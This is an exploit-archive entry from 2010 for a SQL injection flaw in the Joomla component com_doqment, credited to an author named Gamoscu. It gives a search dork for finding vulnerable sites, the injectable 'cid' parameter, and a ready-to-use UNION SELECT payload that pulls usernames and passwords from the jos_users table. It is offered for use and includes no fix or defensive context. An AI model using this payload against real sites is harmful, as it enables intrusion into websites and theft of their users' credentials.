[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_doqment (cid) SQL Injection Vulnerability
# Published : 2010-01-03
# Author : Gamoscu
# Previous Title : Joomla Bridge of Hope Template SQL Injection Vulnerability
# Next Title : Joomla Component com_otzivi Blind SQL Injection Vulnerability


#############################################################################
#							                    #
#   Joomla Component com_doqment (cid) SQL Injection Vulnerability          #
#							                    #
#############################################################################


########################################

[~] Author :  Gamoscu
[~] Site   :  www.1923turk.biz
[~] Site   :  www.1923turk.com
[~] Greetz :  Baybora - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
[~] Blog   :  http://gamoscu.wordpress.com/

########################################

[~] DORK: inurl:com_doqment

########################################

[~] Exploit: /index.php?option=com_doqment&cid=[SQL]
[~] Example: /index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--

########################################